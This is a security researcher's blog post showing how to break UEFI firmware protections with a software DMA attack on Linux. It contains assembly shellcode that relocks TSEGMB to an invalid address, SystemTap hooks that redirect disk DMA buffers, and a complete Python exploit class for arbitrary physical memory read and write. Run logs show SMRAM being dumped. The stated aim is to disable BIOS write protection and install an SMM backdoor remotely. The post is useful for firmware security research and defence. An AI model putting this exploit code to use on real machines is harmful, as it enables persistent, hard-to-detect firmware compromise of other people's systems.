Mastodon

Saturday, September 12, 2015

Breaking UEFI security with software DMA attacks

Hi everyone! In this article I’d like to tell you more about UEFI vulnerabilities exploitation. Last time, in “Exploiting UEFI boot script table vulnerability” blog post I shown how to execute arbitrary shellcode during early PEI phase which allows to bypass security mechanisms that protects System Management Mode memory (SMRAM) from DMA attacks. Now we will perform such DMA attack on SMRAM to disable BIOS_CNTL flash write protection — it will give us the ability to write infected firmware to ROM chip on the motherboard. This attack can be used for installation of my SMM backdoor without having physical access to the target machine (in previous blog post I explained how it works and how to install it using hardware programmer). My software DMA attack approach for Linux operating system hijacks physical address of DMA buffer used by disk driver, concept of such attack originally was presented in BH US 2008 talk by Rafal Wojtczuk “Subverting the Xen hypervisor”.

BIOS write protection mechanisms


Intel hardware provides two main mechanisms to protect SPI ROM chip located on the motherboard from overwriting by operating system:
  • BIOS Write Enable (BIOSWE) and BIOS Lock Enable (BLE) bits of BIOS_CNTL register of Platform Controller Hub (PCH) that accessible via PCI configuration space.
  • SPI flash Protected Range registers PR0-PR5. Also, FLOCKDN bit of HSFS PCH register is used to protect PR registers from overwriting.
My test hardware that was used during previous UEFI experiments, Intel DQ77KB motherboard, is not using SPI flash protected ranges and it’s actually very good for attacker, because this security mechanism (unlike BIOS_CNTL protection) is not relies on System Management Mode and it can’t be defeated by software DMA attack on SMRAM that we talking about. So, information and techniques from this article are relevant mostly for motherboards and laptops that implements flash write protection with BIOS_CNTL.

Here is the description of BIOSWE and BLE bits from Intel® 7 Series / C216 Chipset Family Platform Controller Hub datasheet:

BIOSWE bit is used to control write access to the flash chip, when it’s cleared — only read access is allowed. BLE bit is more interesting, it used to protect BIOSWE bit from unauthorized modifications using SMM code. Let’s see how it works:
  1. During early boot phase system firmware clears BIOSWE and sets BLE, once BLE bit is set — it can’t be modified till the next platform reset.
  2. With BLE = 1 every attempt to set BIOSWE bit raises System Management Interrupt (SMI) — the highest priority interrupt that suspends operating system execution and switches CPU to the System Management Mode.
  3. During SMI dispatch SMM code clears BIOSWE bit back to zero and resumes OS execution, so, attacker’s code that runs under OS will newer able to set BIOSWE.
On properly configured and locked platforms SMM code that was installed by firmware during PEI/DXE boot phase is not accessible by OS, so, it's able to work as secure broker that prevents BIOS write protection configuration from unauthorized modifications. Let’s make a small experiment: using CHIPSEC platform security assessment framework we can write a Python script that accessing BIOS_CNTL register and trying to set BIOSWE bit:
def BIOSWE_set():

    BIOSWE = 1

    # import required CHIPSEC stuff
    import chipsec.chipset
    from chipsec.helper.oshelper import helper

    # initialize CHIPSEC helper
    cs = chipsec.chipset.cs()
    cs.init(None, True)

    # check if BIOS_CNTL register is available
    if not chipsec.chipset.is_register_defined(cs, 'BC'):

        raise Exception('Unsupported hardware')

    # get BIOS_CNTL value
    val = chipsec.chipset.read_register(cs, 'BC')

    print '[+] BIOS_CNTL is 0x%x' % val

    if val & BIOSWE == 0:

        print '[+] Trying to set BIOSWE...'

        # try to set BIOS write enable bit
        chipsec.chipset.write_register(cs, 'BC', val | BIOSWE)

        # check if BIOSWE bit was actually set
        val = chipsec.chipset.read_register(cs, 'BC')
        if val & BIOSWE == 0:

            # fails, BIOSWE modification was prevented by SMM
            print '[!] Can\'t set BIOSWE bit, BIOS write protection is enabled'

        else:

            print '[+] BIOSWE bit was set, BIOS write protection is disabled now'

    else:

        print '[+] BIOSWE bit is already set'

if __name__ == '__main__':

    BIOSWE_set()

After running this script as root we will see that on Intel DQ77KB motherboard it’s not possible to set BIOSWE because of enabled BLE protection:
localhost ~ # python BIOSWE_set.py
[+] BIOS_CNTL is 0x2a
[+] Trying to set BIOSWE...
[!] Can't set BIOSWE bit, BIOS write protection is enabled

To learn more about BIOS write protection and security mechanisms you also can read the following materials:

Direct Memory Access


As you may know, not only CPU has access to the physical memory, different hardware devices connected to the PCI bus, like disk controller or network card, can utilize Direct Memory Access to read or write some data to physical memory independently of the processor. Let’s see how DMA works on example of ATA/ATAPI capable disk controller:
  1. Software allocates chunk of physical memory for I/O operation data and creates Physical Region Descriptor Table (PRDT) entry for this memory. PRDT — is a special data structure of DMA controller that mapped to the physical memory space.
  2. Software initializes Bus Master Register of disk controller that accessible via PCI configuration space with PRDT address and enables bus master operation mode on that controller.
  3. To initiate I/O operation software sends DMA read (0xC8/0x25) or DMA write (0xCA/0x35) ATA/ATAPI command to the target disk device. When the command was sent — operating system can switch execution context to some other task until I/O operation is not finished.
  4. DMA controller responding on DMA requests from disk device and writing data to/from physical memory.
  5. When data transfer is complete — disk device signals an interrupt which allows operating system to resume suspended task execution.
It’s easy to figure that such design is not very secure — malicious DMA capable hardware can ignore the buffer address that was set via PRDT and read/write arbitrary data to arbitrary place of the physical memory without asking any permissions form software to do that. To mitigate this issue Intel introduced VT-d — Intel Virtualization Technology for Directed I/O (also known as IOMMU) which allows to limit direct access to physical memory from the hardware. IOMMU support is present in modern versions of Windows, Linux and OS X but in case of certain firmware attacks, when attacker already has complete control over operating system, it’s also necessary to have a separate (independent from OS or hypervisor) DMA protection mechanism for SMRAM.

The name of this mechanism is TSEGMB register that was already mentioned in previous articles, it must be properly configured and locked by firmware during platform initialization:


However, if target firmware is vulnerable to UEFI boot script table attack we can bypass TSEGMB protection using previously developed exploit. To achieve this we need to modify exploit shellcode and add a several assembly instructions that locks TSEGMB register with the dummy/invalid address that doesn’t match actual SMRAM location:
; bus = 0, dev = 0, func = 0, offset = 0xb8
mov     eax, 0x800000b8
mov     dx, 0xcf8
out     dx, eax

; read TSEGMB value
mov     dx, 0xcfc
in      eax, dx

; check if TSEGMB is not locked
and     eax, 1
test    eax, eax
jnz     _end

; bus = 0, dev = 0, func = 0, offset = 0xb8
mov     eax, 0x800000b8
mov     dx, 0xcf8
out     dx, eax

; write and lock TSEGMB with dummy value
mov     eax, 0xff000001
mov     dx, 0xcfc
out     dx, eax

_end:

; ...

Now we can run the exploit, but first let’s check current TSEGMB value using smm_dma module of the CHIPSEC framework:
localhost chipsec # python chipsec_main.py -m smm_dma

[+] loaded chipsec.modules.smm_dma
[*] running loaded modules ..

[*] running module: chipsec.modules.smm_dma
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/smm_dma.pyc
[x][ =======================================================================
[x][ Module: SMRAM DMA Protection
[x][ =======================================================================
[*] Registers:
[*] PCI0.0.0_TOLUD = 0xDFA00001 << Top of Low Usable DRAM (b:d.f 00:00.0 + 0xBC)
    [00] LOCK             = 1 << Lock
    [20] TOLUD            = DFA << Top of Lower Usable DRAM
[*] PCI0.0.0_BGSM = 0xD7800001 << Base of GTT Stolen Memory (b:d.f 00:00.0 + 0xB4)
    [00] LOCK             = 1 << Lock
    [20] BGSM             = D78 << Base of GTT Stolen Memory
[*] PCI0.0.0_TSEGMB = 0xD7000001 << TSEG Memory Base (b:d.f 00:00.0 + 0xB8)
    [00] LOCK             = 1 << Lock
    [20] TSEGMB           = D70 << TSEG Memory Base
[*] IA32_SMRR_PHYSBASE = 0xD7000006 << SMRR Base Address MSR (MSR 0x1F2)
    [00] Type             = 6 << SMRR memory type
    [12] PhysBase         = D7000 << SMRR physical base address
[*] IA32_SMRR_PHYSMASK = 0xFF800800 << SMRR Range Mask MSR (MSR 0x1F3)
    [11] Valid            = 1 << SMRR valid
    [12] PhysMask         = FF800 << SMRR address range mask

[*] Memory Map:
[*]   Top Of Low Memory             : 0xDFA00000
[*]   TSEG Range (TSEGMB-BGSM)      : [0xD7000000-0xD77FFFFF]
[*]   SMRR Range (size = 0x00800000): [0xD7000000-0xD77FFFFF]

[*] checking locks..
[+]   TSEGMB is locked
[+]   BGSM is locked
[*] checking TSEG alignment..
[+]   TSEGMB is 8MB aligned
[*] checking TSEG covers entire SMRR range..
[+]   TSEG covers entire SMRAM

[+] PASSED: TSEG is properly configured. SMRAM is protected from DMA attacks

Everything is fine as you can see: address 0xD7000000 looks legit and lock bit is also set. You also can run common.smrr module to ensure that System Management Range Registers that used to protect SMRAM from cache poisoning attacks also has the same physical address:
localhost chipsec # python chipsec_main.py -m common.smrr

[+] loaded chipsec.modules.common.smrr
[*] running loaded modules ..

[*] running module: chipsec.modules.common.smrr
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/common/smrr.pyc
[x][ =======================================================================
[x][ Module: CPU SMM Cache Poisoning / System Management Range Registers
[x][ =======================================================================
[+] OK. SMRR range protection is supported

[*] Checking SMRR range base programming..
[*] IA32_SMRR_PHYSBASE = 0xD7000006 << SMRR Base Address MSR (MSR 0x1F2)
    [00] Type             = 6 << SMRR memory type
    [12] PhysBase         = D7000 << SMRR physical base address
[*] SMRR range base: 0x00000000D7000000
[*] SMRR range memory type is Writeback (WB)
[+] OK so far. SMRR range base is programmed

[*] Checking SMRR range mask programming..
[*] IA32_SMRR_PHYSMASK = 0xFF800800 << SMRR Range Mask MSR (MSR 0x1F3)
    [11] Valid            = 1 << SMRR valid
    [12] PhysMask         = FF800 << SMRR address range mask
[*] SMRR range mask: 0x00000000FF800000
[+] OK so far. SMRR range is enabled

[*] Verifying that SMRR range base & mask are the same on all logical CPUs..
[CPU0] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[CPU1] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[CPU2] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[CPU3] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[+] OK so far. SMRR range base/mask match on all logical CPUs
[*] Trying to read memory at SMRR base 0xD7000000..
[+] PASSED: SMRR reads are blocked in non-SMM mode

[+] PASSED: SMRR protection against cache attack is properly configured

Now let’s run boot_script_table module to exploit the vulnerability:
localhost chipsec # python chipsec_main.py -m boot_script_table

[+] loaded chipsec.modules.boot_script_table
[*] running loaded modules ..

[*] running module: chipsec.modules.boot_script_table
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/boot_script_table.pyc
[x][ =======================================================================
[x][ Module: UEFI boot script table vulnerability exploit
[x][ =======================================================================
[*] AcpiGlobalVariable = 0xd5f53f18
[*] UEFI boot script addr = 0xd5f4c018
[*] Target function addr = 0xd5ddf260
8 bytes to patch
Found 106 zero bytes for shellcode at 0xd5deaf96
Jump from 0xd5deaffb to 0xd5ddf268
Jump from 0xd5ddf260 to 0xd5deaf96
Going to S3 sleep for 10 seconds ...
rtcwake: assuming RTC uses UTC ...
rtcwake: wakeup from "mem" using /dev/rtc0 at Tue Aug 25 08:14:15 2015
[*] BIOS_CNTL = 0x28
[*] TSEGMB = 0xd7000000
[!] Bios lock enable bit is not set
[!] SMRAM is not locked
[!] Your system is VULNERABLE

Checking TSEGMB register after exploitation:
localhost chipsec # python chipsec_main.py -m smm_dma

[+] loaded chipsec.modules.smm_dma
[*] running loaded modules ..

[*] running module: chipsec.modules.smm_dma
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/smm_dma.pyc
[x][ =======================================================================
[x][ Module: SMRAM DMA Protection
[x][ =======================================================================
[*] Registers:
[*] PCI0.0.0_TOLUD = 0xDFA00001 << Top of Low Usable DRAM (b:d.f 00:00.0 + 0xBC)
    [00] LOCK             = 1 << Lock
    [20] TOLUD            = DFA << Top of Lower Usable DRAM
[*] PCI0.0.0_BGSM = 0xD7800001 << Base of GTT Stolen Memory (b:d.f 00:00.0 + 0xB4)
    [00] LOCK             = 1 << Lock
    [20] BGSM             = D78 << Base of GTT Stolen Memory
[*] PCI0.0.0_TSEGMB = 0xFF000001 << TSEG Memory Base (b:d.f 00:00.0 + 0xB8)
    [00] LOCK             = 1 << Lock
    [20] TSEGMB           = FF0 << TSEG Memory Base
[*] IA32_SMRR_PHYSBASE = 0xD7000006 << SMRR Base Address MSR (MSR 0x1F2)
    [00] Type             = 6 << SMRR memory type
    [12] PhysBase         = D7000 << SMRR physical base address
[*] IA32_SMRR_PHYSMASK = 0xFF800800 << SMRR Range Mask MSR (MSR 0x1F3)
    [11] Valid            = 1 << SMRR valid
    [12] PhysMask         = FF800 << SMRR address range mask

[*] Memory Map:
[*]   Top Of Low Memory             : 0xDFA00000
[*]   TSEG Range (TSEGMB-BGSM)      : [0xFF000000-0xD77FFFFF]
[*]   SMRR Range (size = 0x00800000): [0xD7000000-0xD77FFFFF]

[*] checking locks..
[+]   TSEGMB is locked
[+]   BGSM is locked
[*] checking TSEG alignment..
[+]   TSEGMB is 8MB aligned
[*] checking TSEG covers entire SMRR range..
[-]   TSEG doesn't cover entire SMRAM

[-] FAILED: TSEG is not properly configured. SMRAM is vulnerable to DMA attacks

Ok, DMA protection of SMRAM is disabled and we can move to the next step. Of course, it’s completely pointless to perform such attack with specially designed hardware: we want to break all the things without having any physical access to the target platform, which means that we need to hijack DMA transactions initiated by operating system with device drivers code hooks.

Hooking Linux kernel with SystemTap


The idea of software DMA attack that was proposed by Rafal Wojtczuk in his “Subverting the Xen hypervisor” talk is the following:
  1. To read arbitrary physical memory attacker opens an empty file with O_DIRECT flag of open() that needed to bypass file system cache.
  2. Then attacker allocates a dummy virtual memory buffer using mmap() and writes it to opened file with the write() syscall.
  3. During disk write dispatch ATAPI driver of Linux kernel calls dma_map_sg() function to setup physical memory buffers for scatter-gather DMA operation. Attacker needs to hook this function to iterate memory buffers information passed in scatterlist structure, find physical address of previously allocated buffer and replace it with address of physical memory that he needs to read.
  4. When write() successfully returns — attacker can read that data back from file to get dumped memory contents.
Arbitrary physical memory write scenario is almost the same, but attacker needs to use read() syscall instead of write().

Kernel documentation has "Dynamic DMA mapping Guide" (DMA-API-HOWTO.TXT) document that might be a good walkthrough into the Linux DMA API for device drivers development. Memory regions allocated for scatter-gather DMA operation are represented by scatterlist structures. Here's it's definition from from kernel headers, physical address of memory buffer that was passed to read()/write() syscall usually going in dma_address field:
struct scatterlist {
#ifdef CONFIG_DEBUG_SG
        unsigned long   sg_magic;
#endif
        unsigned long   page_link;
        unsigned int    offset;
        unsigned int    length;
        dma_addr_t      dma_address;
#ifdef CONFIG_NEED_SG_DMA_LENGTH
        unsigned int    dma_length;
#endif
};

Rafal used loadable kernel module to hook dma_map_sg() function. Unfortunately, on my version of Linux kernel this function defined as simple macro that expands to dma_map_sg_attrs() function:
#define dma_map_sg(d, s, n, r) dma_map_sg_attrs(d, s, n, r, NULL)

static inline int dma_map_sg_attrs(struct device *dev, struct scatterlist *sg,
                                   int nents, enum dma_data_direction dir,
                                   struct dma_attrs *attrs)
{
        struct dma_map_ops *ops = get_dma_ops(dev);
        int i, ents;
        struct scatterlist *s;

        for_each_sg(sg, s, nents, i)
                kmemcheck_mark_initialized(sg_virt(s), s->length);
        BUG_ON(!valid_dma_direction(dir));
        ents = ops->map_sg(dev, sg, nents, dir, attrs);
        BUG_ON(ents < 0);
        debug_dma_map_sg(dev, sg, nents, ents, dir);

        return ents;
}

Because dma_map_sg_attrs() is inline — we can’t locate and hook it's code in easy way, so, we have to find some other solution. As you can see, there’s a call of debug_dma_map_sg() function that also might be possible to hook:
extern void debug_dma_map_sg(struct device *dev, struct scatterlist *sg,
                             int nents, int mapped_ents, int direction);

Actually, this function presents in kernel binary only if it was compiled with CONFIG_DMA_API_DEBUG option and because it’s very unlikely that your favourite Linux distro uses it — we have to configure and build new kernel from the source code. Such limitation isn’t nice, but for proof of concept purposes it seems not very critical. Also, in case of reliable firmware rootkit for real life purposes it’s still possible to implement some binary heuristics that locates inlined dma_map_sg_attrs() code, but for current article this topic is out of the scope.

To make DMA attack PoC a bit more simpler I implemented debug_dma_map_sg() function hook with the help of the SystemTap instead of writing any loadable kernel modules with bare hands. SystemTap is a Linux clone of DTrace that allows developers and administrators to write a scripts on simplified C-like language to examine the activities of a live Linux system. SystemTap works by translating the script to C, running the system C compiler to create a kernel module from that. When the module is loaded — it activates all the probed events by hooking into the kernel.

Here you can see a simple SystemTap script that hooks debug_dma_map_sg() function and prints it’s arguments information into stdout:
#
# kernel function probe handler
#
probe kernel.function("debug_dma_map_sg")
{
    printf("%s(%d): %s(): %d\n", execname(), pid(), probefunc(), $nents);

    #
    # Each call to sys_write() leads to corresponding call of dma_map_sg(),
    # $sg argument contains list of DMA buffers
    #
    for (i = 0; i < $nents; i++)
    {
        printf(" #%d (0x%x): 0x%x\n", i, $sg[i]->length, $sg[i]->dma_address);
    }
}

On debian based systems SystemTap can be installed with apt-get install systemtap command. If you want to install it from the source code — be sure that your kernel was compiled with the following options enabled:
  • CONFIG_DEBUG_INFO
  • CONFIG_KPROBES
  • CONFIG_RELAY
  • CONFIG_DEBUG_FS
  • CONFIG_MODULES
  • CONFIG_MODULE_UNLOAD
  • CONFIG_UPROBES
Now let’s try to run our test script using stap command:
localhost ~ # stap -v debug_dma_map_sg.stp
Pass 1: parsed user script and 109 library script(s) using 62180virt/36436res/4264shr/32980data kb, in 160usr/10sys/171real ms.
Pass 2: analyzed script: 1 probe(s), 11 function(s), 4 embed(s), 0 global(s) using 108852virt/84660res/5780shr/79652data kb, in 790usr/210sys/997real ms.
Pass 3: translated to C into "/tmp/stapo6EAoq/stap_be741121b1c20b85b38ff640ac798be6_6031_src.c" using 108852virt/84788res/5908shr/79652data kb, in 190usr/50sys/237real ms.
Pass 4: compiled C into "stap_be741121b1c20b85b38ff640ac798be6_6031.ko" in 3430usr/290sys/4579real ms.
Pass 5: starting run.
usb-storage(1110): debug_dma_map_sg(): 9
 #0 (0x1000): 0x3ecca2000
 #1 (0x1000): 0x2f34000
 #2 (0x1000): 0x41e2b4000
 #3 (0x1000): 0xd671e000
 #4 (0x1000): 0x41e22e000
 #5 (0x1000): 0x40687b000
 #6 (0x1000): 0x4061b9000
 #7 (0x1000): 0xd670e000
 #8 (0x1000): 0x41ddc0000
usb-storage(1110): debug_dma_map_sg(): 1
 #0 (0x1000): 0x4027e000
usb-storage(1110): debug_dma_map_sg(): 2
 #0 (0x1000): 0x4023d6000
 #1 (0x1000): 0x3f7be6000
usb-storage(1110): debug_dma_map_sg(): 1
 #0 (0x1000): 0x406595000
usb-storage(1110): debug_dma_map_sg(): 1
 #0 (0x1000): 0x41e1fb000
usb-storage(1110): debug_dma_map_sg(): 2
 #0 (0x1000): 0xd5460000
 #1 (0x1000): 0xd522f000
usb-storage(1110): debug_dma_map_sg(): 2

Writing DMA attack exploit


I decided to code software DMA exploit on Python, same as the tools from my previous posts. First of all — we need to implement DMA buffer hijack. Following SystemTap script (stored as Python string variable) accepts physical address of memory buffer passed to read()/write() as first argument and target address of physical memory that we need to read/write as second:
# print more information from running SystemTap script
VERBOSE = False

# script source code
SCRIPT_CODE = '''

global data_len = 0
global verbose = ''' + ('1' if VERBOSE else '0') + '''

#
# kernel function probe handler
#
probe kernel.function("debug_dma_map_sg")
{
    # parse script arguments passed to stap
    phys_addr = strtol(@1, 16);
    target_addr = strtol(@2, 16);

    printf("%s(%d): %s(): %d\\n", execname(), pid(), probefunc(), $nents);

    #
    # Each call to sys_write() leads to corresponding call of dma_map_sg(),
    # $sg argument contains list of DMA buffers
    #
    if (verbose != 0)
    {
        for (i = 0; i < $nents; i++)
        {
            printf(" #%d (0x%x): 0x%x\\n", i, $sg[i]->length, $sg[i]->dma_address);
        }
    }    

    # check for data that came from dma_expl.py os.write() call
    if ($nents > 0 && $sg[0]->dma_address == phys_addr)
    {
        printf("[+] DMA request found, changing address to 0x%x\\n",
               target_addr + data_len);

        # replace addresses of DMA buffers
        for (i = 0; i < $nents; i++)
        {
            $sg[i]->dma_address = target_addr + data_len;
            data_len += $sg[i]->length;    
        }
    }
}

'''

Python class that inherits threading.Thread to run SystemTap script in background and print it’s output into stdout:
SCRIPT_PATH = '/tmp/dma_expl.stp'

class Worker(threading.Thread):

    def __init__(self, phys_addr, target_addr):

        super(Worker, self).__init__()

        self.daemon = True
        self.started = True
        self.count = 0

        # drop script file into the /tmp
        self.create_file()

        # run SystemTap script
        self.p = subprocess.Popen([ 'stap', '-g', '-v', SCRIPT_PATH,
                                  hex(phys_addr), hex(target_addr) ],
                                  stdout = subprocess.PIPE, stderr = subprocess.PIPE)

        # wait for script initialization
        while self.started:

            line = self.p.stderr.readline()
            sys.stdout.write(line)

            if line == '':

                break

            # check for pass 5 that indicates sucessfully loaded script
            elif line.find('Pass 5') == 0:

                print '[+] SystemTap script started'
                break

    def create_file(self):

        # save script contents into the file
        with open(SCRIPT_PATH, 'wb') as fd:

            fd.write(SCRIPT_CODE)

    def run(self):

        while self.started:

            # read and print script output
            line = self.p.stdout.readline()

            if VERBOSE:

                sys.stdout.write(line)

            if line == '':

                self.started = False
                break

            # check for hijacked DMA request
            elif line.find('[+]') == 0:

                self.count += 1

    def start(self):

        super(Worker, self).start()

        # delay after script start
        time.sleep(1)

    def stop(self):

        if self.started:

            # delay before script shutdown
            time.sleep(3)

            self.started = False
            os.kill(self.p.pid, signal.SIGINT)

Now we need to allocate the data buffer for disk read/write and get it’s physical address. Python has build-in mmap module, but this module is not allows to determinate virtual address of allocated memory. To deal with this problem I used ctypes and neat introspection hack that was mentioned in “Understanding Python by breaking it” article by Clement Rouault:
import mmap
from ctypes import *

class PyObj(Structure):

    _fields_ = [("ob_refcnt", c_size_t),
                ("ob_type", c_void_p)]

# ctypes object for introspection
class PyMmap(PyObj):

    _fields_ = [("ob_addr", c_size_t)]

# class that inherits mmap.mmap and has the page address
class MyMap(mmap.mmap):

    def __init__(self, *args, **kwarg):

        # get the page address by introspection of the native structure
        m = PyMmap.from_address(id(self))
        self.addr = m.ob_addr

To convert obtained virtual address to physical exploit uses /proc/self/pagemap Linux pseudo-file that allows to find out which physical frame each virtual page is mapped to. Every page of virtual memory is represented inside pagemap as single 8 bytes structure that contains physical memory Page Frame Number (PFN) and information flags.

Here’s the exploit class, it’s constructor accepts the address of physical memory to read/write, allocates the data buffer, obtains it’s physical address and starts the SystemTap script:
PAGE_SIZE = 0x1000
TEMP_PATH = '/tmp/dma_expl.tmp'

class DmaExpl(object):

    # maximum amount of data that can be transfered during single dma_map_sg() call
    MAX_IO_SIZE = PAGE_SIZE * 0x1E

    def __init__(self, target_addr):

        if target_addr & (PAGE_SIZE - 1) != 0:

            raise Exception('Address must be aligned by 0x%x' % PAGE_SIZE)

        self.phys_addr = 0
        self.target_addr = target_addr
        self.libc = cdll.LoadLibrary("libc.so.6")

        # allocate dummy data buffer
        self.buff = MyMap(-1, self.MAX_IO_SIZE, mmap.PROT_WRITE) 
        self.buff.write('\x41' * self.MAX_IO_SIZE)

        print '[+] Memory allocated at 0x%x' % self.buff.addr

        with open('/proc/self/pagemap', 'rb') as fd:

            # read physical address information
            fd.seek(self.buff.addr / PAGE_SIZE * 8)
            phys_info = struct.unpack('Q', fd.read(8))[0]

            # check that page is mapped and not swapped
            if phys_info & (1L << 63) == 0:

                raise Exception('Page is not present')

            if phys_info & (1L << 62) != 0:

                raise Exception('Page is swapped out')

            # get physical address from PFN
            self.phys_addr = (phys_info & ((1L << 54) - 1)) * PAGE_SIZE

            print '[+] Physical address is 0x%x' % self.phys_addr

        # run SystemTap script in background thread
        self.worker = Worker(self.phys_addr, target_addr)
        self.worker.start()

    def close(self):

        self.worker.stop()

    # ...

DmaExpl class method that reads arbitrary physical memory with DMA attack:
class DmaExpl(object):

    # ...

    def _dma_read(self, read_size):              

        count = self.worker.count

        print '[+] Reading physical memory 0x%x - 0x%x' % \
              (self.target_addr, self.target_addr + read_size - 1)        

        # O_DIRECT is needed to write our data to disk immediately
        fd = os.open(TEMP_PATH, os.O_CREAT | os.O_TRUNC | os.O_RDWR | os.O_DIRECT)

        # initiate DMA transaction
        if self.libc.write(fd, c_void_p(self.buff.addr), read_size) == -1:

            os.close(fd)
            raise Exception("write() fails")

        os.close(fd)

        while self.worker.count == count:

            # wait untill intercepted debug_dma_map_sg() call
            time.sleep(0.1)

        with open(TEMP_PATH, 'rb') as fd:

            # get readed data
            data = fd.read(read_size)

        os.unlink(TEMP_PATH)

        self.target_addr += read_size

        return data

    def read(self, read_size):

        data = ''

        if read_size < PAGE_SIZE or read_size % PAGE_SIZE != 0:

            raise Exception('Invalid read size')

        while read_size > 0:

            #
            # We can read only MAX_IO_SIZE bytes of physical memory
            # with each os.write() call.
            #
            size = min(read_size, self.MAX_IO_SIZE)
            data += self._dma_read(size)

            read_size -= size

        print '[+] DONE'

        return data

And similar method that writes arbitrary physical memory:
class DmaExpl(object):

    # ...

    def _dma_write(self, data):

        count = self.worker.count
        write_size = len(data)

        print '[+] Writing physical memory 0x%x - 0x%x' % \
              (self.target_addr, self.target_addr + write_size - 1)        

        with open(TEMP_PATH, 'wb') as fd:

            # get readed data
            fd.write(data)

        # O_DIRECT is needed to write our data to disk immediately
        fd = os.open(TEMP_PATH, os.O_RDONLY | os.O_DIRECT)

        # initiate DMA transaction
        if self.libc.read(fd, c_void_p(self.buff.addr), write_size) == -1:

            os.close(fd)
            raise Exception("read() fails")

        os.close(fd)

        while self.worker.count == count:

            # wait untill intercepted debug_dma_map_sg() call
            time.sleep(0.1)

        os.unlink(TEMP_PATH)

        self.target_addr += write_size

    def write(self, data):

        ptr = 0
        write_size = len(data)

        if write_size < PAGE_SIZE or write_size % PAGE_SIZE != 0:

            raise Exception('Invalid write size')        

        while ptr < write_size:

            #
            # We can write only MAX_IO_SIZE bytes of physical memory
            # with each os.read() call.
            #
            self._dma_write(data[ptr : ptr + self.MAX_IO_SIZE])
            ptr += self.MAX_IO_SIZE

        print '[+] DONE'

Example of DmaExpl usage, code that reads one page of physical memory starting from the 0xD7000000:
# initialize exploit
expl = DmaExpl(0xD7000000)

# perform physical memory read
data = expl.read(0x1000)

# stop SystemTap script
expl.close()

Using this class I implemented Python script called dma_expl.py, here is the example of it's usage on Intel DQ77KB motherboard to dump TSEG region of SMRAM into the file:
localhost ~ # python dma_expl.py --read 0xD7000000 --size 0x800000 --file TSEG.bin
[+] Memory allocated at 0x7ff0542ec000
[+] Physical address is 0x3fa15e000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36376res/4216shr/32976data kb, in 160usr/0sys/171real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84544res/5644shr/79680data kb, in 780usr/220sys/1120real ms.
Pass 3: translated to C into "/tmp/stapcorPM2/stap_c190a79e672287641579099c59eed383_7943_src.c" using 108880virt/84672res/5772shr/79680data kb, in 170usr/60sys/236real ms.
Pass 4: compiled C into "stap_c190a79e672287641579099c59eed383_7943.ko" in 3560usr/270sys/5209real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Reading physical memory 0xd7000000 - 0xd701dfff
[+] Reading physical memory 0xd701e000 - 0xd703bfff
[+] Reading physical memory 0xd703c000 - 0xd7059fff
[+] Reading physical memory 0xd705a000 - 0xd7077fff
[+] Reading physical memory 0xd7078000 - 0xd7095fff
[+] Reading physical memory 0xd7096000 - 0xd70b3fff
[+] Reading physical memory 0xd70b4000 - 0xd70d1fff
[+] Reading physical memory 0xd70d2000 - 0xd70effff
[+] Reading physical memory 0xd70f0000 - 0xd710dfff
[+] Reading physical memory 0xd710e000 - 0xd712bfff
[+] Reading physical memory 0xd712c000 - 0xd7149fff
[+] Reading physical memory 0xd714a000 - 0xd7167fff
[+] Reading physical memory 0xd7168000 - 0xd7185fff
[+] Reading physical memory 0xd7186000 - 0xd71a3fff
[+] Reading physical memory 0xd71a4000 - 0xd71c1fff
[+] Reading physical memory 0xd71c2000 - 0xd71dffff
[+] Reading physical memory 0xd71e0000 - 0xd71fdfff
[+] Reading physical memory 0xd71fe000 - 0xd721bfff
[+] Reading physical memory 0xd721c000 - 0xd7239fff
[+] Reading physical memory 0xd723a000 - 0xd7257fff
[+] Reading physical memory 0xd7258000 - 0xd7275fff
[+] Reading physical memory 0xd7276000 - 0xd7293fff
[+] Reading physical memory 0xd7294000 - 0xd72b1fff
[+] Reading physical memory 0xd72b2000 - 0xd72cffff
[+] Reading physical memory 0xd72d0000 - 0xd72edfff
[+] Reading physical memory 0xd72ee000 - 0xd730bfff
[+] Reading physical memory 0xd730c000 - 0xd7329fff
[+] Reading physical memory 0xd732a000 - 0xd7347fff
[+] Reading physical memory 0xd7348000 - 0xd7365fff
[+] Reading physical memory 0xd7366000 - 0xd7383fff
[+] Reading physical memory 0xd7384000 - 0xd73a1fff
[+] Reading physical memory 0xd73a2000 - 0xd73bffff
[+] Reading physical memory 0xd73c0000 - 0xd73ddfff
[+] Reading physical memory 0xd73de000 - 0xd73fbfff
[+] Reading physical memory 0xd73fc000 - 0xd7419fff
[+] Reading physical memory 0xd741a000 - 0xd7437fff
[+] Reading physical memory 0xd7438000 - 0xd7455fff
[+] Reading physical memory 0xd7456000 - 0xd7473fff
[+] Reading physical memory 0xd7474000 - 0xd7491fff
[+] Reading physical memory 0xd7492000 - 0xd74affff
[+] Reading physical memory 0xd74b0000 - 0xd74cdfff
[+] Reading physical memory 0xd74ce000 - 0xd74ebfff
[+] Reading physical memory 0xd74ec000 - 0xd7509fff
[+] Reading physical memory 0xd750a000 - 0xd7527fff
[+] Reading physical memory 0xd7528000 - 0xd7545fff
[+] Reading physical memory 0xd7546000 - 0xd7563fff
[+] Reading physical memory 0xd7564000 - 0xd7581fff
[+] Reading physical memory 0xd7582000 - 0xd759ffff
[+] Reading physical memory 0xd75a0000 - 0xd75bdfff
[+] Reading physical memory 0xd75be000 - 0xd75dbfff
[+] Reading physical memory 0xd75dc000 - 0xd75f9fff
[+] Reading physical memory 0xd75fa000 - 0xd7617fff
[+] Reading physical memory 0xd7618000 - 0xd7635fff
[+] Reading physical memory 0xd7636000 - 0xd7653fff
[+] Reading physical memory 0xd7654000 - 0xd7671fff
[+] Reading physical memory 0xd7672000 - 0xd768ffff
[+] Reading physical memory 0xd7690000 - 0xd76adfff
[+] Reading physical memory 0xd76ae000 - 0xd76cbfff
